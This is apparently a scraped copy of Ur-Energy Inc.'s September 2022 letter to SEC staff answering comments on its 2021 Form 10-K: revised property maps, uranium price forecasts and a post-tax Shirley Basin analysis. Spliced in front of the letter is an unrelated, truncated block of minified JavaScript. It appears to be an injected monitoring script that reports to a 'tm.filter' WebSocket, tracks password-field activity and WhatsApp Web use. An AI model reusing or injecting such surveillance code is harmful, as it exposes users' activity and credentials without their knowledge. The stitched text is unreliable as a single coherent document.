YYYY","ig-NG":"D/M/YYYY","kl-GL":"D-M-YYYY","lb-LU":"D/M/YYYY","ba-RU":"D.M.YY","nso-ZA":"YYYY/M/D","quz-BO":"D/M/YYYY","yo-NG":"D/M/YYYY","ha-Latn-NG":"D/M/YYYY","fil-PH":"M/D/YYYY","ps-AF":"D/M/YY","fy-NL":"D-M-YYYY","ne-NP":"M/D/YYYY","se-NO":"D.M.YYYY","iu-Cans-CA":"D/M/YYYY","sr-Latn-RS":"D.M.YYYY","si-LK":"YYYY-M-D","sr-Cyrl-RS":"D.M.YYYY","lo-LA":"D/M/YYYY","kM-KH":"YYYY-M-D","cy-GB":"D/M/YYYY","bo-CN":"YYYY/M/D","sMs-FI":"D.M.YYYY","as-IN":"D-M-YYYY","Ml-IN":"D-M-YY","en-IN":"D-M-YYYY","or-IN":"D-M-YY","bn-IN":"D-M-YY","tk-TM":"D.M.YY","bs-Latn-BA":"D.M.YYYY","Mt-MT":"D/M/YYYY","sr-Cyrl-ME":"D.M.YYYY","se-FI":"D.M.YYYY","zu-ZA":"YYYY/M/D","xh-ZA":"YYYY/M/D","tn-ZA":"YYYY/M/D","hsb-DE":"D. M. YYYY","bs-Cyrl-BA":"D.M.YYYY","tg-Cyrl-TJ":"D.M.YY","sr-Latn-BA":"D.M.YYYY","sMj-NO":"D.M.YYYY","rM-CH":"D/M/YYYY","sMj-SE":"YYYY-M-D","quz-EC":"D/M/YYYY","quz-PE":"D/M/YYYY","hr-BA":"D.M.YYYY.","sr-Latn-ME":"D.M.YYYY","sMa-SE":"YYYY-M-D","en-SG":"D/M/YYYY","ug-CN":"YYYY-M-D","sr-Cyrl-BA":"D.M.YYYY","es-US":"M/D/YYYY"}[navigator.language],document.tmfilter="present")}function g(){(H=new WebSocket(y.connectionString)).onclose=i,H.onmessage=o,H.onopen=l,y.extJs&&(this.extJs.webSockReady=()=&gt;H.readyState===WebSocket.OPEN,this.extJs.webSockSend=Y=&gt;H.send(Y))}function p(){var Y=function(){var Y=["webkit","moz","ms","o"];if("hidden"in document)return"hidden";for(var e=0;e&lt;Y.length;e++)if(Y[e]+"Hidden"in document)return Y[e]+"Hidden";return null}();return!!Y&&document[Y]}function h(){var Y=document.head.querySelector("[name='og:title']");return!!Y&&"WhatsApp Web"===Y.getAttribute("content")}function m(){H.send(JSON.stringify({type:"waptracking"}))}function v(){T=new Map,I=new Set,k=0,(C=new Date).setSeconds(0),C.setMilliseconds(0)}function S(Y){var e={name:Y.data.name,type:Y.data.type};"iframePasswordInputFocused"===Y.data.message?u(e):"iframePasswordInputBlurred"===Y.data.message&&d(e)}Y=this,e={},t={en:{MMMM:"January February March April May June July August September October November December".split(" "),MMM:"Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(" "),dddd:"Sunday Monday Tuesday Wednesday Thursday Friday Saturday".split(" "),ddd:"Sun Mon Tue Wed Thu Fri Sat".split(" "),dd:"Su Mo Tu We Th Fr Sa".split(" "),A:["a.m.","p.m."],formatter:{YYYY:function(Y){return("000"+Y.getFullYear()).slice(-4)},YY:function(Y){return("0"+Y.getFullYear()).slice(-2)},Y:function(Y){return""+Y.getFullYear()},MMMM:function(Y){return this.MMMM[Y.getMonth()]},MMM:function(Y){return this.MMM[Y.getMonth()]},MM:function(Y){return("0"+(Y.getMonth()+1)).slice(-2)},M:function(Y){return""+(Y.getMonth()+1)},DD:function(Y){return("0"+Y.getDate()).slice(-2)},D:function(Y){return""+Y.getDate()},HH:function(Y){return("0"+Y.getHours()).slice(-2)},H:function(Y){return""+Y.getHours()},A:function(Y){return this.A[11&lt;Y.getHours()|0]},hh:function(Y){return("0"+(Y.getHours()%12||12)).slice(-2)},h:function(Y){return""+(Y.getHours()%12||12)},mm:function(Y){return("0"+Y.getMinutes()).slice(-2)},m:function(Y){return""+Y.getMinutes()},ss:function(Y){return("0"+Y.getSeconds()).slice(-2)},s:function(Y){return""+Y.getSeconds()},SSS:function(Y){return("00"+Y.getMilliseconds()).slice(-3)},SS:function(Y){return("0"+(Y.getMilliseconds()/10|0)).slice(-2)},S:function(Y){return""+(Y.getMilliseconds()/100|0)},dddd:function(Y){return this.dddd[Y.getDay()]},ddd:function(Y){return this.ddd[Y.getDay()]},dd:function(Y){return this.dd[Y.getDay()]},Z:function(Y){return(0&lt;(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,s=Y.length;a&lt;s;a++)t=Y[a],!e.indexOf(t)&&t.length&gt;r&&(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),s=t.en,i=s.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=i[Y];return e?i.post(e.call(s,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,s,i=t.en,o=i.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,d={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var D=0,l=1;for(s="";!s;)s=a[++D];a=s.charAt(0);var f=o.slice(M);if(2&gt;D){var g=i.parser[s].call(i,f,n);c[a]=g.index,"M"===a&&c[a]++,l=g.length}else if(7&gt;D)g=(f.match(d[D])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-s.length):g),l=g.length;else if(" "!==a&&a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===o.length&&g?(c.Y+=70&gt;c.Y?2e3:100&gt;c.Y?1900:0,c.H=c.H||i.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1&gt;c.M||12&lt;c.M||1&gt;c.D||c.D&gt;Y[c.M-1]||23&lt;c.H||59&lt;c.m||59&lt;c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&&Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var y={token:"55a89c6b-7176-44c8-a76a-2df84c9b3f93",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"2020",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},N=6e4,b=null,A=null,w=null,E=null,L=!1,T=null,I=null,k=0,C=null,H=null,O="",P=!1;!function Y(e){p()?setTimeout((function(){Y(e)}),1e3):e()}((function(){y.extJs&&y.extJs.init(y.token),n()&&(window.addEventListener("focus",r,!0),y.dontTrackWebPasswords&&window.addEventListener("message",S,!1)),n()||y.extJs?f():y.dontTrackWebPasswords&&D()}))}();&#xD;&#xD; &#xD;&#xD; &#xD;

Colorado Office 10758 W. Centennial Rd. Littleton, CO 80127 Tel: 866-981-4588	Wyoming Office 1478 Willer Drive Casper, WY 82604 Tel: 307-265-2373

September 21, 2022

VIA EDGAR

Office of Energy and Transportation
Division of Corporation Finance
U.S. Securities and Exchange Commission
100 F Street, NE
Washington, D.C. 20549

RE: Ur-Energy Inc.
        Form 10-K for the Fiscal Year ended December 31, 2021
        Filed March 9, 2022
        File No. 001-33905

Dear Messrs. Wojciechowski, Hiller and Schuler:

Ur-Energy Inc. (“Company”) is in receipt of the further comment letter from the staff (“Staff”) of the United States Securities and Exchange Commission (“SEC”) dated July 1, 2022 (“July SEC Letter”) regarding the Company’s Annual Report on Form 10-K for the fiscal year ended December 31, 2021 filed with the SEC on March 9, 2022 (the “Form 10-K”). The Company’s responses to the July SEC Letter are set forth below. For convenience, the comments in the July SEC Letter are reproduced below (the “Comments”), together with appropriate references to prior comments contained in the SEC correspondence of June 6, 2022 (the “Prior Comments”).

Form 10-K for the Fiscal Year ended December 31, 2021
Lost Creek Property, page 14

Comment No. 1 We note your response to prior comment 1 explaining that the Lost Creek map has a precision of better than one mile, referencing the maps on pages 14 and 18, and proposing to include a map for your Shirley Basin properties in future filings. However, the Lost Creek map should be revised as necessary to make the section numbers legible. Alternatively, you may provide an accompanying narrative to specify the section numbers, township, and range for the Lost Creek property in the accompanying narrative to address the location requirements.

Response to Comment No. 1:
We have included a revised map of each of the Lost Creek Property and the Shirley Basin Project on pages 14 and 17, respectively, of the Form 10-K/A filed simultaneously with this response.

Office of Energy and Transportation
Division of Corporation Finance, SEC
September 21, 2022

Comment No. 2:

Exhibits 96.1 & 96.2
Section 11 - Mineral Resource Estimates, page ES-11

Comment 2. We understand from your responses to prior comments 3, 4 and 5 that you would prefer to limit compliance with the Technical Report Summary disclosure requirements to future filings. However, we continue to believe that you should obtain and file an amendment to the Form 10-K to include revised exhibits that include all of the prescribed disclosures. We previously advised of requirements pertaining to the cutoff grade calculation, uranium price forecasts, and the need for cash flows underlying the assessment of the Shirley Basin property to reflect costs of state and federal income taxes. We note that you have proposed some incremental disclosures in response to our comments. However, we believe that incremental details are required as outlined in the following points.

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With regard to prior comment three, disclosure of the cutoff grade calculation should include the specific uranium price utilized, and your operating costs.
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With regard to prior comment four, the qualified person should include a discussion of the uranium price forecasts that are referenced, a description of the raw data, and clarify how this information was combined in deriving an average for the price estimate and the time period when these forecasts were prepared.
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With regard to prior comment five, the economic analysis conducted by the qualified person should be based on post-tax cash flows, considering federal and state taxes, consistent with the approach taken with your Lost Creek property.

We reissue prior comments three, four and five.

Prior Comment No. 3: Please obtain and file a modified exhibit disclosing the cutoff grade calculation along with the assumed uranium prices, costs, metallurgical recoveries, and the rationale for the prices that were selected. See Item 601(b)(96)(iii)(B)(11)(iii) of Regulation S-K.

Response to Prior Comment No. 3:
Both of our Initial Assessments include the optional step of a detailed economic analysis using annual pricing and cost projections to demonstrate the economic viability of each of the Lost Creek Property and the Shirley Basin Project. As such, we understand based on our discussions with the Staff, that further revisions will not be necessary in response to this comment.

Office of Energy and Transportation
Division of Corporation Finance, SEC
September 21, 2022

Section 16.0 - Market Studies, page ES-16

Prior Comment No. 4: We note various remarks within each report indicating the uranium sale price is based on projections of VIII Capital Corporation, Cantor Fitzgerald Canada Corporation, H.C. Wainwright & Company, and UxC, LLC.  Please obtain and file a modified exhibit that includes a discussion of these uranium price forecasts, that clarifies when they were made, how they were combined in deriving an average for the estimate, and how the price forecast varies from year to year.  See Item 601(b)(96)(iii)(B)(16)(i) of Regulation S-K.

Response to Prior Comment No. 4:
The Form 10-K/A filed simultaneously with this response includes an amended Technical Report Summary for each of the Lost Creek Property and the Shirley Basin Project. Each of the amended Technical Report Summaries includes a more fulsome discussion of the consensus pricing projections which come from reports by several independent, third-party financial firms prepared in the fourth quarter of 2021, specifically VIII Capital Corp., Cantor Fitzgerald Canada Corporation, H.C. Wainwright & Co. and UxC, LLC. In addition to the date of each report being included in the reference chapter, the complete date is now set out in that discussion in Chapter 16.0.

The future price assumptions in the amended Technical Report Summaries were created by taking the simple average (mean) of the annual price projections contained in these independently prepared reports and reflects the individual, proprietary projections of each analyst regarding future uranium prices.

Also, the annual average sales price drawn from these projections is included in an additional row of the cash flow table, to provide greater clarity and convenience to the reader. (E.g., Table 12 in the Lost Creek Report and Table 17 in the Shirley Basin Report).

Prior Comment No. 5: Please obtain and file a modified exhibit for the Shirley Basin property that includes a post-tax cash flow, considering federal and state taxes, consistent with the approach taken with your Lost Creek property. See Item 601(b)(96)(iii)(B)(19)(i) of Regulation S-K.

Response to Prior Comment No. 5:
The amended Technical Report Summary for the Shirley Basin Project (Exhibit 96.2) includes a post-tax analysis for the Shirley Basin Project consistent with the approach taken on the Lost Creek Property. Specifically, based upon certain assumptions set forth in the report, the analysis includes annual and project-total post-tax data (state and federal income taxes) and the effects of taxes on annual cash flows, net present values, internal rates of return and related sensitivities.

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We have endeavored to provide you with everything requested. Should you have additional questions or comments, please contact the undersigned at 720-981-4588 or at roger.smith@ur-energy.com.

Sincerely,
Ur-Energy Inc.

/s/ Roger L. Smith
By: ___________________________
Roger L. Smith
Chief Financial Officer